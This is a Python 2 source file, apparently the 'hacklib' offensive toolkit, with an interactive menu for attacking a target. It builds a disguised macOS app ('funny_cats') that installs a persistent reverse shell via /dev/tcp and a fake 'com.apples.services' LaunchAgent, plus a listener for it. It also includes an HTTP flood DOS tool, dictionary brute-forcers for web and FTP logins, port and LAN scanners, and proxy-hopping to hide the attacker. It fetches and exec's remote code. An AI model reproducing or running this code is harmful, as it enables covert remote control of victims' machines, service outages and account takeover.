'''The MIT License (MIT) Copyright (c) 2016 Leon Li (leon@apolyse.com) Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.''' import socket import threading import time import urllib2 import os from Queue import Queue try: # Import scapy if they have it. If they don't, they can still use hacklib from scapy.all import * import logging logging.getLogger("scapy.runtime").setLevel(logging.ERROR) # Fixes scapy logging error except: pass from string import ascii_uppercase, ascii_lowercase, digits # Import for PatternCreate and PatternOffset class Backdoor(object): '''Creates an app carrying a persistent backdoor payload. Currently only for Mac OSX. Payloads for Windows and Linux coming soon.''' def __init__(self): self.IP = '' self.port = '' self.osx_payload = '''#!/bin/bash mkdir ~/Library/.h echo '#!/bin/bash bash -i >& /dev/tcp/HOST/PORT 0>&1 wait' > ~/Library/.h/connect.sh chmod +x ~/Library/.h/connect.sh echo '<plist version="1.0"> <dict> <key>Label</key> <string>com.apples.services</string> <key>ProgramArguments</key> <array> <string>/bin/sh</string> <string>'$HOME'/Library/.h/connect.sh</string> </array> <key>RunAtLoad</key> <true/> <key>StartInterval</key> <integer>60</integer> <key>AbandonProcessGroup</key> <true/> </dict> </plist>' > ~/Library/LaunchAgents/com.apples.services.plist chmod 600 ~/Library/LaunchAgents/com.apples.services.plist launchctl load ~/Library/LaunchAgents/com.apples.services.plist exit ''' def create(self, IP, port, OS, appname='funny_cats'): '''Creates a user-level reverse shell.''' if OS == 'OSX': self.osx_payload = self.osx_payload.replace('HOST', IP).replace('PORT', str(port)) try: os.makedirs(os.getcwd() + '/' + appname + '.app/Contents/MacOS') except: pass payload_path = os.getcwd() + '/' + appname + '.app/Contents/MacOS/' + appname with open(payload_path, 'w') as f: f.write(self.osx_payload) import subprocess subprocess.Popen(['chmod', '755', payload_path]) print 'Payload saved to ' + os.getcwd() + '/' + appname + '.app' class Server(object): def __init__(self, port): import socket self.port = port self.address = ('', port) def listen(self): import time sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.bind(self.address) sock.listen(1) while True: connection, cAddress = sock.accept() try: print 'New connection', cAddress while True: data = connection.recv(32768) if data: print '\n'.join(data.split('\n')[:-1]) response = raw_input('bash$ ') data = None if response: connection.sendall(response + '\n') time.sleep(0.5) finally: connection.close() class FTPAuth(object): '''FTP login and command handler. Commands: login() Args: username, password send() Args: message ''' def __init__(self, IP, port=21): self.IP = IP self.port = port self.username = '' self.password = '' self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.s.settimeout(5) self.s.connect((self.IP, self.port)) self.s.recv(1024) def _send(self, message): self.s.send(message) response = self.s.recv(32768) return response def send(self, message): self.s.send(message + '\r\n') while True: response = self.s.recv(32768) if response: return response def login(self, username, password): self._send('USER ' + username + '\r\n') response = self._send('PASS ' + password + '\r\n') if '230' in response: return elif '331' in response: return 'Password required' else: raise Exception(response) class AuthClient(object): '''Universal login tool for most login pages as well as HTTP Basic Authentication. Commands: login() Args: url, username, password ''' def __init__(self): self.url = '' self.username = '' self.password = '' def _get_login_type(self): try: # Attempts to urlopen target URL without exception data = urllib2.urlopen(self.url) return 'FORM' except Exception, e: if 'error 401' in str(e).lower(): return 'BA' if 'timed out' in str(e).lower(): return 'TO' def _login_mechanize(self): try: import mechanize except: raise MissingPackageException('Please install the mechanize module before continuing.') # Sets up common input names/ids and creates instance of mechanize.Browser() userfields = ['user', 'username', 'usr', 'email', 'name', 'login', 'userid', 'userid-input', 'player'] passfields = ['pass', 'password', 'passwd', 'pw', 'pwd'] br = mechanize.Browser() br.set_handle_robots(False) br.set_handle_refresh(False) br.addheaders = [('User-agent', 'googlebot')] # Opens URL and lists controls response = br.open(self.url) loginurl = response.geturl() br.form = list(br.forms())[0] username_control = '' password_control = '' # Locates username and password input, and submits login info for control in br.form.controls: if control.name and control.name.lower() in userfields or control.id and control.id.lower() in userfields: username_control = control if control.name and control.name.lower() in passfields or control.id and control.id.lower() in passfields: password_control = control username_control.value = self.username try: password_control.value = self.password except: # Detected a username input but not a password input. # Submits form with username and attempts to detect password input in resulting page response = br.submit() br.form = list(br.forms())[0] for control in br.form.controls: if control.name and control.name.lower() in passfields or control.id and control.id.lower() in passfields: password_control = control password_control.value = self.password response = br.submit() # Returns response if the URL is changed. Assumes login failure if URL is the same if response.geturl() != loginurl: return response.read() else: raise Exception('Login credentials incorrect.') def _login_BA(self): try: # Creates a PasswordMgr instance passmanager = urllib2.HTTPPasswordMgrWithDefaultRealm() passmanager.add_password(None, self.url, self.username, self.password) # Creates an auth handling object and builds it with opener auth = urllib2.HTTPBasicAuthHandler(passmanager) opener = urllib2.build_opener(auth) response = opener.open(self.url, timeout=8) data = response.read() response.close() return data except Exception, e: if 'Error 401' in str(e): raise Exception('Login credentials incorrect.') def login(self, url, username, password): self.url = url self.username = username self.password = password # ascertain the type of login page given by url logintype = self. _get_login_type() if logintype == 'BA': # attempts to login with BA method and return html return self._login_BA() if logintype == 'TO': raise Exception('Request timed out.') if logintype == 'FORM': return self._login_mechanize() class DOSer(object): '''Hits a host with GET requests on default port 80 from multiple threads. Commands: launch() Args: host, duration, threads(default 1), port(default 80), payload(default crocodile) ''' def __init__(self): self.target = '127.0.0.1' self.port = 80 self.threads = 1 self.payload = '?INTERIORCROCODILEALLIGATORIDRIVEACHEVROLETMOVIETHEATER' self.start_time = 0 self.time_length = 1 def _attack(self, target): # Sends GET requests for time_length duration while int(time.time()) < self.start_time + self.time_length: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(1) try: s.connect((self.target, self.port)) s.send("GET /" + self.payload + " HTTP/1.1\r\n") s.send("Host: " + self.target + "\r\n\r\n") except: pass def _threader(self): while True: self.worker = self.q.get() self._attack(self.worker) self.q.task_done() def launch(self, host, duration, threads=1, port=80, payload='default'): '''Launches threaded GET requests for (duration) seconds. ''' self.target = host self.port = port self.threads = threads self.start_time = int(time.time()) self.time_length = duration if payload != 'default': self.payload = payload # Creates queue to hold each thread self.q = Queue.Queue() #print '> Launching ' + str(threads) + ' threads for ' + str(duration) + ' seconds.' for i in range(threads): t = threading.Thread(target=self._threader) t.daemon = True t.start() # Adds workers to queue for worker in range(0, threads): self.q.put(worker) self.q.join() return class PortScanner(object): '''Scan an IP address using scan(host) with default port range 1-1024. Commands: scan() Args: IP, port_range(default 1024), timeout(default 1), verbose(default True) ''' def __init__(self): self.IP = '127.0.0.1' self.port_range = '1025' self.print_lock = threading.Lock() self.timeout = 2 self.openlist = [] self.verbose = True def _portscan(self, port): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(self.timeout) # Tries to establish a connection to port, and append to list of open ports try: con = s.connect((self.IP, port)) response = s.recv(1024) self.openlist.append(port) if self.verbose: with self.print_lock: print 'Port', str(port) + ':' print response s.close() # If the connection fails, tries to establish HTTP connection if port is a common HTTP port except Exception, e: httplist = [80, 81, 443, 1900, 2082, 2083, 8080, 8443] if port in httplist: try: headers = '''GET /HTTP/1.1 Host: ''' + self.IP + ''' User-Agent: googlebot Accept: text/html, application/xhtml+xml, application/xml; q=09, */*; q=0.8 Accept-Language: en-US, en; q=0.5 Accept-Encoding: gzip, deflate''' + '\r\n\r\n' s.send(headers) response = s.recv(1024) response = response.splitlines() response = '\n'.join(response[:7]) self.openlist.append(port) if self.verbose: with self.print_lock: print 'Port', str(port) + ':' print response s.close() except: pass def portOpen(self, port): if port in self.openlist: return else: return False def _threader(self): while True: self.worker = self.q.get() self._portscan(self.worker) self.q.task_done() def scan(self, IP, port_range=(1, 1025), timeout=1, verbose=True): '''Scans ports of an IP address. Use getIP() to find IP address of host. ''' self.openlist = [] self.IP = IP self.port_range = port_range self.timeout = 1 # Creates queue to hold each thread self.q = Queue.Queue() for x in range(30): t = threading.Thread(target=self._threader) t.daemon = True t.start() # Adds workers to queue for worker in range(port_range[0], port_range[1]): self.q.put(worker) self.q.join() class LanScanner(object): '''Scans local devices on your LAN network. Commands: scan() Args: host_range(default (1, 255)) ''' def __init__(self): self.host_range = [] self.alive_hosts = [] self.localIP = '' def _threader(self): while True: self.worker = self.q.get() self._scan(self.worker) self.q.task_done() def _scan(self, host): import subprocess try: resp = subprocess.check_output(['ping', '-c1', '-W90', host]) self.alive_hosts.append(host) except: return def getLocalIP(self): import subprocess proc = subprocess.Popen(["ifconfig"], stdout=subprocess.PIPE, shell=True) (out, err) = proc.communicate() data = out.splitlines() for line in data: if 'inet ' in line and '127.' not in line: return line.split(' ')[1] def scan(self, h_range=(1, 255)): # Finds local IP first in order to determine IP range of local network localip = self.getLocalIP() stub = '.'.join(localip.split('.')[:-1]) # Adds list of possible local hosts to self.range_range for i in range(h_range[0], h_range[1]): self.host_range.append(stub + '.' + str(i)) self.q = Queue.Queue() # Launches 100 threads to ping 254 potential hosts for x in range(100): t = threading.Thread(target=self._threader) t.daemon = True t.start() for worker in self.host_range: self.q.put(worker) self.q.join() return list(set(self.alive_hosts)) class _Getch: """Gets a single character from standard input. Does not echo to the screen.""" def __init__(self): try: self.impl = _GetchWindows() except ImportError: try: self.impl = _GetchUnix() except ImportError: self.impl = _GetchMacCarbon() def __call__(self): return self.impl() class _GetchUnix: def __init__(self): import tty import sys import termios def __call__(self): import sys import tty import termios try: fd = sys.stdin.fileno() old_settings = termios.tcgetattr(fd) try: tty.setraw(sys.stdin.fileno()) ch = sys.stdin.read(1) finally: termios.tcsetattr(fd, termios.TCSADRAIN, old_settings) return ch except: return raw_input('> ') class _GetchWindows: def __init__(self): import msvcrt def __call__(self): try: import msvcrt return msvcrt.getch() except: return raw_input('> ') class Proxy(object): '''Can work in conjunction with getProxies() to tunnel all network activity in the Python script through a Socks4/5 proxy. Commands: connect() Args: getProxies(), timeout=10 connect_manual() Args: IP, port, proxy_type ''' def __init__(self): self.IP = '' self.port = '' self.proxy_type = '' self.country = '' self._socksfile = urllib2.urlopen('https://raw.githubusercontent.com/Anorov/PySocks/master/socks.py').read() global socks # Dynamically import socks.py from the internet socks = importFromString(self._socksfile, 'socks') def connect(self, proxies, timeout=10): for proxy in proxies: if proxy[4] == 'Socks4': self.proxy_type = socks.PROXY_TYPE_SOCKS4 else: self.proxy_type = socks.PROXY_TYPE_SOCKS5 try: # Sets the socket.socket class to the socks module's socksocket class socks.setdefaultproxy(self.proxy_type, proxy[0], int(proxy[1])) socket.socket = socks.socksocket # Tests to see if the proxy can open a webpage currentIP = urllib2.urlopen('http://icanhazip.com/', timeout=timeout).read().split()[0] self.IP = proxy[0] self.port = int(proxy[1]) self.country = proxy[2] return except: pass raise Exception('Couldn\'t connect to any proxies.') def connect_manual(IP, port, proxy_type='Socks5'): if proxy_type == 'Socks4': self.proxy_type = socks.PROXY_TYPE_SOCKS4 else: self.proxy_type = socks.PROXY_TYPE_SOCKS5 try: socks.setdefaultproxy(self.proxy_type, IP, port) socket.socket = socks.socksocket currentIP = urllib2.urlopen('http://icanhazip.com/').read().split()[0] self.IP = IP self.port = port return currentIP except: raise Exception('Connection failed.') def importFromString(code, name): """Import dynamically generated code as a module. Args: code: a string, a file handle, or a compiled binary name: the name of the module """ import sys import imp module = imp.new_module(name) exec code in module.__dict__ return module def getIP(host): return socket.gethostbyname(host) def randomIP(): import struct return socket.inet_ntoa(struct.pack('>I', random.randint(1, 0xffffffff))) def getProxies(country_filter='ALL', proxy_type=('Socks4', 'Socks5')): '''Gets list of recently tested Socks4/5 proxies. Return format is as follows: [IP, Port, Country Code, Country, Proxy Type, Anonymous, Yes/No, Last Checked] Args: country_filter: Specify country codes within a tuple, e.g. ('US', 'MX') proxy_type: Specify whic Socks version to use, e.g. 'Socks5' ''' try: import mechanize except: raise MissingPackageException('Please install the mechanize module before continuing. Use hacklib.installDependencies()') try: from bs4 import BeautifulSoup except: raise MissingPackageException('Please install the beautifulsoup4 module before continuing. Use hacklib.installDependencies()') br = mechanize.Browser() br.set_handle_robots(False) br.addheaders = [('User-agent', 'googlebot')] data = br.open('http://www.socks-proxy.net').read() soup = BeautifulSoup(data, 'html.parser') proxylist = [] table = soup.find('table') tbody = table.find('tbody') rows = tbody.find_all('tr') for row in rows: cols = row.find_all('td') cols = [ele.text.strip() for ele in cols] proxylist.append([ele for ele in cols if ele]) filteredlist = [] if not country_filter == 'ALL': for proxy in proxylist: if proxy[2] in country_filter: filteredlist.append(proxy) proxylist = filteredlist filteredlist = [] if not proxy_type == ('Socks4', 'Socks5'): for proxy in proxylist: if not country_filter == 'ALL': if proxy[4] in proxy_type and proxy[2] in country_filter: filteredlist.append(proxy) else: if proxy[4] in proxy_type: filteredlist.append(proxy) proxylist = filteredlist return proxylist def installDependencies(): import subprocess mech = subprocess.check_output(['/usr/local/bin/pip', 'install', 'mechanize']) if 'successfully installed' in mech: print 'Installed mechanize' beaut = subprocess.check_output(['/usr/local/bin/pip', 'install', 'bs4']) if 'successfully installed' in beaut: print 'Installed beautifulsoup' scapy = subprocess.check_output(['/usr/local/bin/pip', 'install', 'scapy']) if 'successfully installed' in scapy: print 'Installed scapy' pcapy = subprocess.check_output(['/usr/local/bin/pip', 'install', 'pcapy']) if 'successfully installed' in pcapy: print 'Installed pcapy' sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) def send(IP, port, message, keepalive=False): '''Creates new socket and sends a TCP message. If keepalive is true, use hacklib.sock to handle socket and hacklib.sock.close() when finished. ''' if keepalive: global sock else: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((IP, port)) sock.send(message) response = sock.recv(2048) if not keepalive: sock.close() return response def ping(host): """Pings a host and returns true if the host exists. """ import os import platform ping_str = "-n 1" if platform.system().lower() == "windows" else "-c 1" return os.system("ping " + ping_str + " " + host) == 0 def topPasswords(amount): '''Get up to 100,000 most common passwords. ''' url = 'https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/10_million_password_list_top_100000.txt' passlist = urllib2.urlopen(url).read().split('\n') return passlist[:amount] def uiPortScan(address): print '' print '1) default scan (port range 1-1024)' print '2) custom range' ink = _Getch() cmd = ink() ps = PortScanner() print 'Beginning port scan.' if cmd == '1': ps.scan(address) if cmd == '2': s_port = raw_input('Input starting port > ') e_port = raw_input('Input end port >') ps.scan(address, (int(s_port), int(e_port))) print 'Port scan complete.' def uiDOS(address): dos = DOSer() print '' duration = raw_input('Duration > ') threads = raw_input('Threads > ') port = int(raw_input('Port > ')) payload = raw_input('Payload > ') print 'Launching DOS attack' dos.launch(address, duration, threads, port, payload) def uiTCPMessage(address): print '' port = int(raw_input('Input port >')) message = raw_input('Message > ') send(address, port, message) def uiLogin(address): print '' print 'Select login type' print '1) HTTP/Form login' print '2) FTP login' print '3) Exit' print '' ink = _Getch() cmd = ink() if cmd == '1': ac = AuthClient() print '1) Dictionary attack' print '2) Exit' ink = _Getch() cmd = ink() if cmd == '1': username = raw_input('Username > ') print '1) Try most common passwords' print '2) Import password list (separated by newline)' cmd = ink() if cmd == '1': print 'Try the top <input number> out of 100,000 most common passwords:' num = int(raw_input('> ')) passwords = topPasswords(num) if cmd == '2': passfile = raw_input('Filepath > ') with open(passfile, 'r') as f: passwords = passfile.read().splitlines() print 'Input a unique string the webpage may respond with if login fails' print 'i.e. "please try again" or "login failed"' failstring = raw_input('> ') for password in passwords: try: data = ac.login(address, username, password) if failstring in data: print password + ' failed' elif failstring not in data: print 'Login success!' print 'Password is: ' + password time.sleep(2) return except: print password + ' failed' if cmd == '2': return if cmd == '2': ftp = FTPAuth(address) print '1) Dictionary attack' print '2) Single login' print '3) Exit' ink = _Getch() cmd = ink() username = raw_input('Username > ') if cmd == '1': print 'Try the top <input number> out of 100,000 most common passwords:' num = raw_input('> ') for password in topPasswords(num): try: response = ftp.send('USER ' + username + '\r\n') if '331' in response: response = ftp.send('PASS ' + password + '\r\n') if '331' in response: response = ftp.send('PASS ' + password + '\r\n') if '230' in response: print 'Login success!' print 'Password is: ' + password time.sleep(2) return if '530' in response: print password + ' failed.' ftp = FTPAuth(address) except: print password + ' failed.' ftp = FTPAuth(address) if cmd == '2': username = raw_input('Username > ') ftp.send('USER ' + username + '\r\n') password = raw_input('Password > ') ftp.send('PASS ' + password + '\r\n') if cmd == '3': return def uiLanScan(): lan = LanScanner() print 'Starting Lan scan' hosts = lan.scan() for ip in hosts: print ip print 'Lan scan complete.' time.sleep(2) def uiCreateBackdoor(): print '' print 'Select OS' print '1) Mac OSX' ink = _Getch() cmd = ink() if cmd == '1': ip = raw_input('Listener IP > ') port = raw_input('Listener Port > ') appname = raw_input('Filename > ') bd = Backdoor() bd.create(ip, port, 'OSX', appname) time.sleep(2) def uiServer(): print '' port = raw_input('Listening port > ') s = Server(int(port)) print 'Listening on port ' + port s.listen() def userInterface(): '''Start UI if hacklib isn't being used as a library. ''' firstrun = 0 while True: if firstrun == 0: print '----------------------------------------------' print 'Hey. What can I do you for?' print '\n' firstrun += 1 print 'Enter the number corresponding to your choice.' print '' print '1) Connect to a proxy' print '2) Target an IP or URL' print '3) Lan Scan' print '4) Create Backdoor' print '5) Server' print '6) Exit' ink = _Getch() cmd = ink() if cmd == '6': return if cmd == '2': address = raw_input('Input IP or URL > ') if '.' not in address: print 'Invalid IP/URL.' return print 'What would you like to do?' print '' print '1) Port scan' print '2) DOS' print '3) Send TCP message' print '4) Attempt login' print '5) Exit' cmd = ink() if cmd == '1': uiPortScan(getIP(address)) if cmd == '2': uiDOS(getIP(address)) if cmd == '3': uiTCPMessage(getIP(address)) if cmd == '4': uiLogin(address) cmd = '' if cmd == '3': uiLanScan() if cmd == '4': uiCreateBackdoor() if cmd == '5': uiServer() if cmd == '1': print 'Would you like to automatically find a proxy or input one manually?' print 'Enter the number corresponding to your choice.' print '' print '1) Auto' print '2) Manual' cmd = ink() print 'Connecting to a SOCKS proxy.' proxies = getProxies() global proxy proxy = Proxy() if cmd == '1': proxy.connect(getProxies()) print 'Your new IP address is ' + proxy.IP print 'This proxy is located in ' + proxy.country print '---------' time.sleep(2) if cmd == '2': pr_address = raw_input('Proxy address > ') pr_port = raw_input('Proxy port > ') pr_type = raw_input('Enter "Socks4" or "Socks5" > ') try: proxy.connect_manual(pr_address, pr_port, pr_type) except: print 'Connection failed.' time.sleep(2) pass print 'Proxy connected.' time.sleep(2) pass """ This Class Mangles Words specified by the user Example: Test = hacklib.Mangle("Test", 1, 10, 1996, 2016) Test.Leet() Output: T3st """ class Mangle: def __init__(self, text, num1, num2, year1, year2): self.num1 = num1 self.num2 = num2 self.year1 = year1 self.year2 = year2 self.text = text def Numbers(self): for x in self.text.split(): for i in range(self.num1, self.num2): print ("%s" + "%s") % (x, i) print ("%s" + "%s") % (i, x) def Years(self): for x in self.text.split(): for i in range(self.year1, self.year2): print ("%s" + "%s") % (x, i) print ("%s" + "%s") % (i, x) def UniqueNum(self): for x in self.text.split(): for i in range(self.num1, self.num2): print ("%s" + "%s" + "%s") % (x, x, i) def UniqueYears(self): for x in self.text.split(): for i in range(self.year1, self.year2): print ("%s" + "%s" + "%s") % (x, x, i) def FirstLetterCapNum(self): for x in self.text.split(): for i in range(self.num1, self.num2): print ("%s" + "%s") % (x.capitalize(), i) print ("%s" + "%s") % (i, x.capitalize()) def Caps(self): for x in self.text.split(): print x.capitalize() def UniqueCaps(self): for x in self.text.split(): print ("%s" + "s") % (x.capitalize(), x.capitalize()) def CapandYears(self): for x in self.text.split(): for i in range(self.year1, self.year2): print ("%s" + "%s") % (x.capitalize(), i) print ("%s" + "%s") % (i, x.capitalize()) def Leet(self): for x in self.text.split(): print x.replace("e", "3").replace("i", "1").replace("O", "0").replace("I", "1").replace("E", "3").replace("o", "0").replace("l", "1").replace("L", "1").replace("g", "9").replace("G", "6").replace("b", "8").replace("B", "8") def LeetCap(self): for x in self.text.split(): print x.capitalize().replace("e", "3").replace("i", "1").replace("O", "0").replace("I", "1").replace("E", "3").replace("o", "0").replace("l", "1").replace("L", "1").replace("g", "9").replace("G", "6").replace("b", "8").replace("B", "8") def LeetYears(self): for x in self.text.split(): for i in range(self.year1, self.year2): print ("%s" + "%s") % (x.replace("e", "3").replace("i", "1").replace("O", "0").replace("I", "1").replace("E", "3").replace("o", "0").replace("l", "1").replace("L", "1").replace("g", "9").replace("G", "6").replace("b", "8").replace("B", "8"), i) print ("%s" + "%s") % (i, x.replace("e", "3").replace("i", "1").replace("O", "0").replace("I", "1").replace("E", "3").replace("o", "0").replace("l", "1").replace("L", "1").replace("g", "9").replace("G", "6").replace("b", "8").replace("B", "8")) def LeetNumbers(self): for x in self.text.split(): for i in range(self.num1, self.num2): print ("%s" + "%s") % (x.replace("e", "3").replace("i", "1").replace("O", "0").replace("I", "1").replace("E", "3").replace("o", "0").replace("l", "1").replace("L", "1").replace("g", "9").replace("G", "6").replace("b", "8").replace("B", "8"), i) print ("%s" + "%s") % (i, x.replace("e", "3").replace("i", "1").replace("O", "0").replace("I", "1").replace("E", "3").replace("o", "0").replace("l", "1").replace("L", "1").replace("g", "9").replace("G", "6").replace("b", "8").replace("B", "8")) def UniqueLeet(self): for x in self.text.split(): print ("%s" + "%s") % (x.replace("e", "3").replace("i", "1").replace("O", "0").replace("I", "1").replace("E", "3").replace("o", "0").replace("l", "1").replace("L", "1").replace("g", "9").replace("G", "6").replace("b", "8").replace("B", "8"), (x.replace("e", "3").replace("i", "1").replace("O", "0").replace("I", "1").replace("E", "3").replace("o", "0").replace("l", "1").replace("L", "1").replace("g", "9").replace("G", "6").replace("b", "8").replace("B", "8"))) def Reverse(self): for x in self.text.split(): print x[::-1] def ReverseCap(self): for x in self.text.split(): print x[::-1].capitalize() def ReverseNum(self): for x in self.text.split(): for i in range(self.num1, self.num2): print ("%s" + "%s") % (x[::-1], i) print ("%s" + "%s") % (i, x[::-1]) def ReverseYears(self): for x in self.text.split(): for i in range(self.year1, self.year2): print ("%s" + "%s") % (x[::-1], i) print ("%s" + "%s") % (i, x[::-1]) def ReverseUnique(self): for x in self.text.split(): print x[::-1] + x[::-1] ''' This Classes Dectects Probe Requests from Wireless Devices. Example: Probe = Proberequests("wlan0") Probe.startSniff() ''' class Proberequests: global probeReqs probeReqs = [] def __init__(self, interface): self.interface = interface def sniffProbe(self, p): if p.haslayer(Dot11ProbeReq): netName = p.getlayer(Dot11ProbeReq).info if netName not in probeReqs: probeReqs.append(netName) print '[!] Detected New Probe Request: ' print "[+] ESSID: " + netName + " BSSID: " + p.addr2 def startSniff(self): print "[+] Scanning...\n" sniff(iface=self.interface, prn=self.sniffProbe) """ This class creates a unique pattern of 20280 characters. This is a replica of the metasploit tool called pattern_create.rb Example: patternTest = PatternCreate(1000) patternTest.generate() Creates a unique pattern of 1000 characters. """ class PatternCreate: global MAX_PATTERN_LENGTH MAX_PATTERN_LENGTH = 20280 def __init__(self, length): self.length = length def generate(self): output = [] """ Generate a pattern of a given length up to a maximum of 20280 - after this the pattern would repeat """ if self.length >= MAX_PATTERN_LENGTH: raise MaxLengthException('ERROR: Pattern length exceeds maximum of %d' % MAX_PATTERN_LENGTH) pattern = '' for upper in ascii_uppercase: for lower in ascii_lowercase: for digit in digits: if len(pattern) < self.length: pattern += upper+lower+digit else: out = pattern[:self.length] output.append(out) print str(output)[1:-1].replace("'", "") """ This class finds the offset from the PatternCreate class. This is a replica of the metasploit tool called pattern_offset.rb Example: offset = PatternOffset("Aw1A") offset.find() Finds offset of Aw1A. Output: [+] Offset: 663 """ class PatternOffset: def __init__(self, search_pattern): self.search_pattern = search_pattern def find(self): offset = [] needle = self.search_pattern try: if needle.startswith('0x'): # Strip off '0x', convert to ASCII and reverse needle = needle[2:] needle = bytes.fromhex(needle).decode('ascii') needle = needle[::-1] except TypeError as e: print('Unable to convert hex input:', e) sys.exit(1) haystack = '' for upper in ascii_uppercase: for lower in ascii_lowercase: for digit in digits: haystack += upper+lower+digit found_at = haystack.find(needle) if found_at > -1: offset = found_at print "[+] Offset: " + str(offset) if __name__ == '__main__': userInterface() class MissingPackageException(Exception): '''Raise when 3rd party modules are not able to be imported.''' class MissingPipexception(Exception): '''Raise when pip is not able to be found'''